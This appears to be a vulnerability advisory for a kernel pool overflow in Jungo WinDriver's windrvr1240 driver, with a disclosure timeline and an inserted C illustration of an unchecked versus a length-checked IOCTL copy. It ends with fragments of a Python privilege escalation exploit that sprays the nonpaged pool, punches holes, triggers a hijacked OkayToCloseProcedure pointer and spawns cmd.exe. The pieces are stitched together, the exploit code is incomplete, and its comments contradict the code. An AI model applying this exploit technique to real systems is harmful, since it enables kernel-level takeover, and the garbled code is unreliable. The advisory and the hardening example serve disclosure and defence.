This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within the processing of IOCTL 0x95382673 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data, which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code in the context of the kernel.
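The class of defect described above, as an added illustration in C that is not Jungo's driver code: a user-mode model of an IOCTL dispatch routine that copies a caller-supplied request into a fixed-size pool allocation. The vulnerable form trusts the caller-supplied length and overwrites whatever sits after the allocation; the hardened form rejects any request larger than the destination before copying. The 64-byte chunk size, the status values and every name (ioctl_handler_unchecked, ioctl_handler_checked, run_request, CHUNK_SIZE) are assumptions made for the illustration, and the request bytes are constructed sample input.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Added illustration, not Jungo's driver code. A user-mode model of an
 * IOCTL dispatch routine that copies a caller-supplied request into a
 * fixed-size pool allocation. All sizes and names are assumptions.
 */

#define POOL_SIZE   256   /* simulated nonpaged-pool region */
#define CHUNK_SIZE   64   /* assumed size of the IOCTL's destination allocation */

/* Status values modelled loosely on NTSTATUS conventions (assumed). */
#define STATUS_SUCCESS            0
#define STATUS_BUFFER_TOO_SMALL   1
#define STATUS_INVALID_PARAMETER  2

/* Marker standing in for the header of the chunk adjacent to ours. */
static const uint8_t NEIGHBOUR_MARKER[4] = { 0xDE, 0xAD, 0xBE, 0xEF };

typedef int (*ioctl_handler_fn)(uint8_t *chunk, size_t chunk_size,
                                const uint8_t *user_buf, size_t user_len);

/* Vulnerable pattern: trusts the caller-supplied length and copies it
 * verbatim, so user_len > chunk_size overwrites the neighbouring chunk. */
int ioctl_handler_unchecked(uint8_t *chunk, size_t chunk_size,
                            const uint8_t *user_buf, size_t user_len)
{
    (void)chunk_size;                 /* never consulted: the defect */
    memcpy(chunk, user_buf, user_len);
    return STATUS_SUCCESS;
}

/* Hardened pattern: validate the request against the destination before
 * any bytes are copied, and fail closed on a bad pointer or length. */
int ioctl_handler_checked(uint8_t *chunk, size_t chunk_size,
                          const uint8_t *user_buf, size_t user_len)
{
    if (user_buf == NULL)
        return STATUS_INVALID_PARAMETER;
    if (user_len > chunk_size)
        return STATUS_BUFFER_TOO_SMALL;
    memcpy(chunk, user_buf, user_len);
    return STATUS_SUCCESS;
}

/* Dispatch one constructed request of user_len bytes (filled with 'A')
 * into a fresh simulated pool. Reports the handler's status and whether
 * the neighbouring chunk's marker survived. */
static void run_request(ioctl_handler_fn handler, size_t user_len,
                        int *status, int *neighbour_intact)
{
    uint8_t pool[POOL_SIZE];
    uint8_t request[POOL_SIZE];   /* constructed sample input */

    if (user_len > sizeof request)    /* keep the simulation itself in bounds */
        user_len = sizeof request;

    memset(pool, 0, sizeof pool);
    memset(request, 'A', sizeof request);
    memcpy(pool + CHUNK_SIZE, NEIGHBOUR_MARKER, sizeof NEIGHBOUR_MARKER);

    *status = handler(pool, CHUNK_SIZE, request, user_len);
    *neighbour_intact =
        memcmp(pool + CHUNK_SIZE, NEIGHBOUR_MARKER, sizeof NEIGHBOUR_MARKER) == 0;
}

/* Status the handler returned for a request of user_len bytes. */
int request_status(ioctl_handler_fn handler, size_t user_len)
{
    int status, intact;
    run_request(handler, user_len, &status, &intact);
    return status;
}

/* 1 if the adjacent chunk's marker is untouched after the request, else 0. */
int neighbour_survives(ioctl_handler_fn handler, size_t user_len)
{
    int status, intact;
    run_request(handler, user_len, &status, &intact);
    return intact;
}

int main(void)
{
    size_t lens[] = { 32, 96 };
    for (size_t i = 0; i < 2; i++) {
        printf("len=%zu unchecked: status=%d neighbour_intact=%d\n", lens[i],
               request_status(ioctl_handler_unchecked, lens[i]),
               neighbour_survives(ioctl_handler_unchecked, lens[i]));
        printf("len=%zu checked:   status=%d neighbour_intact=%d\n", lens[i],
               request_status(ioctl_handler_checked, lens[i]),
               neighbour_survives(ioctl_handler_checked, lens[i]));
    }
    return 0;
}
```

The 96-byte request is the interesting case: the unchecked handler reports success while the neighbouring chunk's header has been overwritten, which is exactly the condition a pool overflow turns into a crash or a corrupted object; the checked handler returns STATUS_BUFFER_TOO_SMALL and leaves the neighbour intact. In a real driver the validation belongs on the length the I/O manager reports for the request, and on any length field embedded in the request body, before the copy.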

Timeline:
=========

2017-08-22 – Verified and sent to Jungo via [email protected]/[email protected]/[email protected]/[email protected]
2017-08-25 – No response from Jungo and two bounced emails
2017-08-26 – Attempted a follow up with the vendor via website chat
2017-08-26 – No response via the website chat
2017-09-03 – Received an email from a Jungo representative stating that they are "looking into it"
2017-09-03 – Requested a timeframe for patch development and warned of possible 0day release
2017-09-06 – No response from Jungo
2017-09-06 – Public 0day release of advisory

import os
from ctypes import windll

kernel32 = windll.kernel32


def we_can_spray():
    """
    Spray the Kernel Pool with IoCompletionReserve and Event Objects.
    The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length.
    These are allocated from the Nonpaged kernel pool.
    """
    handles = []
    for i in range(0, 50000):
        handles.append(kernel32.CreateMutexA(None, False, None))
    # could do with some better validation
    if len(handles) > 0:
        return True
    return False


# Fragment: the enclosing function's definition and the `holes` list it
# iterates are not part of this excerpt.
    # make the holes to fill
    for hole in holes:
        for handle in hole:
            kernel32.CloseHandle(handle)
    return True


def trigger_lpe():
    """
    This function frees the IoCompletionReserve objects and this triggers
    the registered aexit, which is our controlled pointer to OkayToCloseProcedure.
    """
    # free the corrupted chunk to trigger OkayToCloseProcedure
    # we don't know where the free chunk is, we just know it's in one of the pages
    # full of Mutants and that it's the 2nd chunk after the overflowed buffer.
    # (`to_free` is populated by code not included in this excerpt.)
    for v in to_free:
        kernel32.CloseHandle(v)
    os.system("cmd.exe")